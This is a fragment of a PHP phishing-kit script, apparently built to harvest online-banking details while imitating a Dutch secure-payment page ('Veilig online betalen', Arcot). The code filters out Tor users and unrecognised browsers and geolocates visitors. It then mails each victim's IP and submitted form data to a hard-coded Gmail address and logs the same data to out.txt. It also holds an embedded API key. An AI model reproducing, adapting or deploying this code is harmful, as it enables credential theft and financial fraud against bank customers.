Forbidden
Sorry. You are using a suspicious IP.
TOR Project-IP's are banned here ! ";
exit();
}
function get_user_browser()
{
$u_agent = $_SERVER['HTTP_USER_AGENT'];
$ub = '';
if(preg_match('/MSIE/i',$u_agent))
{
$ub = "ie";
}
elseif(preg_match('/Firefox/i',$u_agent))
{
$ub = "firefox";
}
elseif(preg_match('/Safari/i',$u_agent))
{
$ub = "safari";
}
elseif(preg_match('/Chrome/i',$u_agent))
{
$ub = "chrome";
}
elseif(preg_match('/Flock/i',$u_agent))
{
$ub = "flock";
}
elseif(preg_match('/Opera/i',$u_agent))
{
$ub = "opera";
}
return $ub;
}
$x = get_user_browser();
if (($x != "firefox") and ($x != "ie") and ($x != "safari") and ($x != "chrome") and ($x != "flock") and ($x != "opera")) { die('');}
$country = '';
$IP = $_SERVER['REMOTE_ADDR'];
if (!empty($IP)) {
$country = file_get_contents('http://api.hostip.info/country.php?ip='.$IP);
$c = file_get_contents('http://api.ipinfodb.com/v3/ip-country/?key=2f6c3b3df9ecfe97990ad93bb1642a0e4a0e2d80fa85ebd11908075b03a0f471&ip='.$IP);
}
$infos = explode(";",$c);
$message .= "IP: ".$IP."\n";
$recipient = "benito.pellitteri@gmail.com";
$subject = "BMO Created By Poison";
$headers = "From: ";
$headers .= $_POST['eMailAdd']."\n";
$headers .= "MIME-Version: 1.0\n";
mail ($recipient, "HIT", $message);
$fh = fopen("out.txt", "a+");
fwrite($fh, $message);
fclose($fh);
//if ($infos[4] != "NETHERLANDS") { die('');}
?>
Veilig online betalen
U wordt doorgelinkt naar de beveiligde omgeving van Arcot.